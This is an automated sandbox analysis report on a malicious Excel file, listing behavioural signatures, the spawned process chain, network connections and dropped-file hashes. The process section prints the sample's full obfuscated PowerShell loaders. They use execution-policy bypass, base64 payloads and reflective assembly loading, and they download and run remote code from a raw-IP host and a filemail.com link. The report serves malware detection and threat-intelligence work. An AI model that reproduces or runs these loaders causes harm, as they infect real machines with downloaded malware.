Malware Analysis Report

2024-12-07 16:55

Sample ID 241113-cxjtcavdnd
Target 61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls
SHA256 61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315

Threat Level: Known bad

The file 61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Evasion via Device Credential Deployment

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Uses Task Scheduler COM API

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 02:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 02:27

Reported

2024-11-13 02:29

Platform

win7-20240903-en

Max time kernel

140s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2844 wrote to memory of 2576 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe
PID 2844 wrote to memory of 2576 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe
PID 2844 wrote to memory of 2576 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe
PID 2844 wrote to memory of 2576 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe
PID 2576 wrote to memory of 1200 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1200 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1200 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 1200 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2016 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2576 wrote to memory of 2016 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2576 wrote to memory of 2016 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2576 wrote to memory of 2016 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2576 wrote to memory of 1456 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WScript.exe
PID 2576 wrote to memory of 1456 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WScript.exe
PID 2576 wrote to memory of 1456 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WScript.exe
PID 2576 wrote to memory of 1456 N/A C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe C:\Windows\SysWOW64\WScript.exe
PID 1456 wrote to memory of 2976 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 2976 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 2976 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 2976 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2976 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2976 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2976 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2976 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\61718bc890c69da3085e39ae891336f349b76b739377ae010835920ba72d7315.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe

"C:\Windows\sYSTEm32\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe" "pOWErSHELl.eXE -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe ; IeX($(IeX('[sysTem.tEXT.ENCODInG]'+[CHAR]58+[ChaR]58+'Utf8.gETsTriNg([SYSteM.cOnvERt]'+[chaR]0X3A+[chAr]58+'FROMBaSe64STRing('+[ChAr]0X22+'JDNjTHBiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRlRmlOSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhOa0lIQ0FhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFBZk52LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sY2l1LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUm96bGRXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEN6Sik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhDWVBaQWZ5U3giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ6UmpHTW94ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzY0xwYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4yMy4yMTIuMjMzLzMzMS9zZWV0aGViZXN0dGhpbmdzb2ZnaXJsc3NoZWlzYW1vbnRoZXJmdWNrZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMiLDAsMCk7U1RhclQtc0xlZXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMi'+[ChaR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hpapsbpf.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA67.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFA66.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdiVnBpbWFnZVVybCA9IE1SQmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jJysnb20vYXBpL2ZpbGUvZycrJ2V0PycrJ2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEsnKydqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGInKydiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgTVJCO2JWcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7YlZwaW1hZ2VCeXRlcyA9IGJWcHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEoYlZwaW1hZ2VVcmwpO2JWcGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGJWcGltYWdlQnl0ZXMpO2JWcHMnKyd0YXJ0RmxhZyA9IE1SQjw8QkFTRTY0X1NUQVJUPj5NUkI7YlZwZW5kRmxhZyA9IE1SQjw8QkFTRTY0X0VORD4+TVJCO2JWcHN0YXJ0SW5kZXggPSBiVnBpbWFnZVRleHQuSW5kZXhPZihiVnBzdGFydEZsYWcpO2JWcGVuZEluZGV4ID0gYlZwaW1hZ2VUZXh0LkluZGV4T2YoYlZwZW5kRmxhZyk7YlZwc3RhcnRJbmRlJysneCAtZ2UgMCAtYW5kICcrJ2JWcGVuZEluZGV4IC1ndCBiJysnVnBzdGFydEluZGV4O2JWcHN0YXJ0SW5kJysnZXggKz0gYlZwc3RhcnRGbGFnLkxlbmd0aDtiVnBiYXMnKydlNjRMZW5ndGggPSBiVicrJ3BlbmRJbmRleCAtIGJWcHN0YXJ0SW5kZXg7YlZwYmFzZTY0Q29tbWFuZCA9IGJWJysncGknKydtYWcnKydlVGV4dC5TdWJzdHJpbmcoYlZwc3RhcnRJbmRlJysneCcrJywgYlZwYmFzZTY0TGVuZ3QnKydoKTtiVnBiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChiVnBiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdkdRIEZvckVhY2gtT2JqZWN0IHsgYlZwJysnXyB9KVstMS4uLShiVnBiYXNlNjRDb21tYW5kJysnLkxlbmd0aCcrJyldO2JWcGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyJysnb21CYXNlNjRTdHJpbmcoYlZwYmFzZTY0UmV2ZScrJ3InKydzZScrJ2QpO2JWcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChiVnBjbycrJ21tYW4nKydkQnl0ZXMpO2JWcHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoTVJCVkFJTVJCKTtiVnB2YWlNZXRob2QuSW52b2tlKGJWcG51bGwsIEAoTVJCdHh0LlJSRlRSVy8xMzMvMzMyLjIxMi4zMi44OTEnKycvLzpwdHRoTVJCLCBNUkJkZScrJ3NhdGl2YWRvTVJCLCBNUkJkZXNhdGl2YWRvTVJCLCBNUkJkZXNhdGknKyd2YWRvTVJCLCBNUkJDYXNQb2xNUkIsIE1SQmRlJysnc2F0aXZhZG9NUkInKycsIE1SQmRlc2F0aXZhZG9NUkIsTVJCZGVzYXRpdmFkb01SQixNUkInKydkZXNhdGl2YWRvTVJCLE1SQmRlc2F0aXZhZG9NUkIsTScrJ1JCZGVzYXRpdmFkb01SQixNUkJkZXNhJysndCcrJ2l2YWRvTVJCLE1SQjFNUkIsTVJCJysnZGVzYXRpdmFkb01SQikpOycpLlJFcExhQ2UoKFtjSEFyXTk4K1tjSEFyXTg2K1tjSEFyXTExMiksW1N0cklOR11bY0hBcl0zNikuUkVwTGFDZSgndkdRJyxbU3RySU5HXVtjSEFyXTEyNCkuUkVwTGFDZSgnTVJCJyxbU3RySU5HXVtjSEFyXTM5KXwmKCAkU2hFTGxJZFsxXSskc0hlTGxJRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bVpimageUrl = MRBhttps://1017.filemail.c'+'om/api/file/g'+'et?'+'filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTK'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614b'+'b209c62c1730945176a0904f MRB;bVpwebClient = New-Object System.Net.WebClient;bVpimageBytes = bVpwebClient.'+'DownloadData(bVpimageUrl);bVpimageText = [System.Text.Encoding]::UTF8.GetString(bVpimageBytes);bVps'+'tartFlag = MRB<<BASE64_START>>MRB;bVpendFlag = MRB<<BASE64_END>>MRB;bVpstartIndex = bVpimageText.IndexOf(bVpstartFlag);bVpendIndex = bVpimageText.IndexOf(bVpendFlag);bVpstartInde'+'x -ge 0 -and '+'bVpendIndex -gt b'+'VpstartIndex;bVpstartInd'+'ex += bVpstartFlag.Length;bVpbas'+'e64Length = bV'+'pendIndex - bVpstartIndex;bVpbase64Command = bV'+'pi'+'mag'+'eText.Substring(bVpstartInde'+'x'+', bVpbase64Lengt'+'h);bVpbase64Reversed = -join (bVpbase64Command.ToCharArray'+'() vGQ ForEach-Object { bVp'+'_ })[-1..-(bVpbase64Command'+'.Length'+')];bVpcommandBytes = [System.Convert]::Fr'+'omBase64String(bVpbase64Reve'+'r'+'se'+'d);bVploadedAssembly = [System.Reflection.Assembly]::Load(bVpco'+'mman'+'dBytes);bVpvaiMethod = [dnlib.IO.Home].GetMethod(MRBVAIMRB);bVpvaiMethod.Invoke(bVpnull, @(MRBtxt.RRFTRW/133/332.212.32.891'+'//:ptthMRB, MRBde'+'sativadoMRB, MRBdesativadoMRB, MRBdesati'+'vadoMRB, MRBCasPolMRB, MRBde'+'sativadoMRB'+', MRBdesativadoMRB,MRBdesativadoMRB,MRB'+'desativadoMRB,MRBdesativadoMRB,M'+'RBdesativadoMRB,MRBdesa'+'t'+'ivadoMRB,MRB1MRB,MRB'+'desativadoMRB));').REpLaCe(([cHAr]98+[cHAr]86+[cHAr]112),[StrING][cHAr]36).REpLaCe('vGQ',[StrING][cHAr]124).REpLaCe('MRB',[StrING][cHAr]39)|&( $ShELlId[1]+$sHeLlID[13]+'x')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 198.23.212.233:80 198.23.212.233 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.23.212.233:80 198.23.212.233 tcp
US 198.23.212.233:80 198.23.212.233 tcp
US 8.8.8.8:53 1017.filemail.com udp
US 142.215.209.78:443 1017.filemail.com tcp
US 142.215.209.78:443 1017.filemail.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

memory/1968-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1968-1-0x00000000728CD000-0x00000000728D8000-memory.dmp

memory/2844-16-0x0000000001120000-0x0000000001122000-memory.dmp

memory/1968-17-0x0000000002DF0000-0x0000000002DF2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 84da1fa0a8668590c3a367aab2d0c397
SHA1 d8bfc05bb73c1eab09d45b8ef69b367fd2e80198
SHA256 061378e048a632cd78e3feea719f9b786155b7eb6e4f6b132a57a6371d22c843
SHA512 6b5f09b57a4d75e0e44fcac79f7fbdf6430d840944a0993cce3cfbf5c37ee99817d34f29543ade6e76e8fc21460a3d07161f88ee308478ef1a8f6573d1563569

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 17eb5c74b13d2e30a7f133f75bf94d1d
SHA1 26d436eed1f3f53d21270a2d7aeb3f173b569308
SHA256 11edd19b5007104334471b5d5a846bb4d920e3e097dea0176956f5a3d3b412d7
SHA512 bd32c9aee95132693bb784c3d26700dccc58e97a6dcd8d4c30cd4a19ee57ee008bc05a0a5f4fbd186ec9be8f8f3bac10a02b5c73693939b83c27d75722739423

C:\Users\Admin\AppData\Local\Temp\CabF1BE.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\mitradesignworkgoodforeveryoneforgiftedmbestthings[1].hta

MD5 37a0b6a74ad79df551606fac2c7fc164
SHA1 3f4aac72c2cfccf897597e95bec0f63e734428d0
SHA256 3a5d43a60266671e60cce1d630ca663acd70d8eec5acd0a1078db2deb1ed516f
SHA512 83ea0410d687c62cae37d07c511fd0279357676ba54245dca254a5b8ec644c216e9e4f94eb5283bfc0b25109bbd209bfeffddfafa8889a296f4083a18aca994a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 da62dfb1897cfe193af5bdd748f613c6
SHA1 b6e1ce5dbf0e7b02d8b9c62276df5eb4f6d66e9d
SHA256 6150d2f2b2fb8a0f6de46a66095aaaba9b115d8e923b0bcf2bf01703c70ae77d
SHA512 e7e98f60eaf83f3c5785737879cca094e612c6c93b7a7d5528a65e86de661230973d5786921aa419c9b64aa502c13282369181e2548a98301f144fee134b601e

\??\c:\Users\Admin\AppData\Local\Temp\hpapsbpf.cmdline

MD5 7d287ab52e4b4bd1d2f248fc56286f7b
SHA1 b0462abf61bb49e6a5e93c62ba024329b8945b9f
SHA256 e990a5fe9abbe826928bb5dbd7ef1844914b371096193a6dd31254689d77d8bb
SHA512 381cbe3fba85be2096594d43bf5081b0f6e78903b1baf4193b727fd987dc390243d950d3c4e163a1b3558042faaecc072eb39401cab8f80e9e2b3c96c9584921

\??\c:\Users\Admin\AppData\Local\Temp\hpapsbpf.0.cs

MD5 381b1194ec5fc354bf3696ed51323c18
SHA1 7d58fdbfdaa987d85d72478f3d225686b2d8dabe
SHA256 4acc1cdda62e68a822d5fd6dc065d75cb465390d1f4be7d046f811437a784455
SHA512 7f434aaf3b20b7bdf694e5e14c7bd60fe4470b8ea73742ea969b282d27d4b6c18101229aef7b547774beb44f4d8c21769a11e4b3a5a833c773fea7fbe5e4a750

\??\c:\Users\Admin\AppData\Local\Temp\CSCFA66.tmp

MD5 4244fac53aa84d3c1b0ac6a41b1f4f12
SHA1 ead0b1e03d0406df40d13f579277d53b2b45a0fa
SHA256 93f5383ee1b032b3871e1d683d58a84aee9b53251bf13633875c5c605bba5ccb
SHA512 18bdeea7c8722693bfecd5f0556979c5160f6b863c73a914d5bea95c9707c96f7d0fd304ce7488645f6486502fca8bfc0cc691a2a1cb8e389c742128a0946beb

C:\Users\Admin\AppData\Local\Temp\RESFA67.tmp

MD5 a4adda4606efb82642fa928d0b15b068
SHA1 64a172943b3327330351f6c30a9e0205e44f63c6
SHA256 65e09596afce7fab22196a473ff013e24dda2d3f036f7b766b26890cc6fde96d
SHA512 5d8696e8dcb15c7f6827ddbb76d3ef91a1fd0277294bc729c5727afd54608e46e30aa29041fa9e5dc1f43e0003990bcd318493cc9c9b1db5e974a8ed626b7512

C:\Users\Admin\AppData\Local\Temp\hpapsbpf.dll

MD5 29f33f3360d741b3790f3b8a2acc0c93
SHA1 ea29ee1a7abc6b2d285b6e63e68637748bf36d32
SHA256 8a80769deea7abcb9b961df234375ab507dc5d5cb690e5a8ad05ea0a998063b6
SHA512 c6e085ef8c781f93c4e511245e46d7bbb17a8ca3b4ad4ae104d991844201ad2899cdc49b8ff5c0920a57fc9a6c6a7af31a70a2b9041a0f085742ca4ac4cc5bb5

C:\Users\Admin\AppData\Local\Temp\hpapsbpf.pdb

MD5 c2d7682fd47102a0b80fb0b751be1c95
SHA1 d11c21d2481ed0426733a2c1ec8ef5363f20b562
SHA256 1130f1a9559f542c9dc447a7405760c19df48055ff9b198348f92557912a3e3a
SHA512 ecb7f181e4692b1df37a35aa4e257fb9ec7b17e629688123e5ebeabf45f5c5d4656ff355e31593be5e258c4e1b8046e95160503181ba6c4ce7182b92a68fa617

memory/1968-60-0x00000000728CD000-0x00000000728D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS

MD5 a859403a72c197e1753a1519aac692e3
SHA1 7fbfdbb1384879f2ce069c72e4ce7b437bac8c0c
SHA256 4b3e15d8f27431ef7ba26051739774ac4ab9d5584b28bff4489cf503d434f38c
SHA512 9063f5760623203dd494a335040a57c3ab9a41193344f872739e0e55b43fccbb81033c528dd007952198ce089ab3dd8c9ef3b0d2b9eaba628a05b960def11ee9

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
